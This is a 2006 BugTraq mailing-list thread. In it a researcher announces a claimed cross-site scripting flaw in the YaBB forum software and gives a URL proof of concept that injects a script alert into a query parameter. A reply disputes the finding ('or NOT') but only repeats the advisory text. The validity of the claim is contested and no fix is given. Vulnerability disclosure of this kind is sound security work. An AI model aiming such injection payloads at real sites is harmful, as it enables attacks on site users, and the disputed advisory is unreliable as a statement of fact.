BugTraq
Back to list
|
Post reply
Yabb XSS
Aug 10 2006 04:13AM
Outlaw aria-security net
(1 replies)
########################################################################
###################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & C0d3r & l2odon & R@1D3N @ DrtRp & #
########################################################################
###################
#Software: YaBB
#Attack method: Cross Site Scripting
#
#
#Proof of Concept:
#
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss
")</script>
#
#----------------------------------------------------------
#
#Solution
#
#No Solutions
#
#Contact : Outlaw (at) aria-security (dot) net [email concealed]
#
[ reply ]
Re: Yabb XSS - or NOT
Aug 13 2006 09:56PM
Volker Tanger (vtlists wyae de)
Privacy Statement
Copyright 2010, SecurityFocus
###################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & C0d3r & l2odon & R@1D3N @ DrtRp & #
########################################################################
###################
#Software: YaBB
#Attack method: Cross Site Scripting
#
#
#Proof of Concept:
#
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss
")</script>
#
#----------------------------------------------------------
#
#Solution
#
#No Solutions
#
#Contact : Outlaw (at) aria-security (dot) net [email concealed]
#
[ reply ]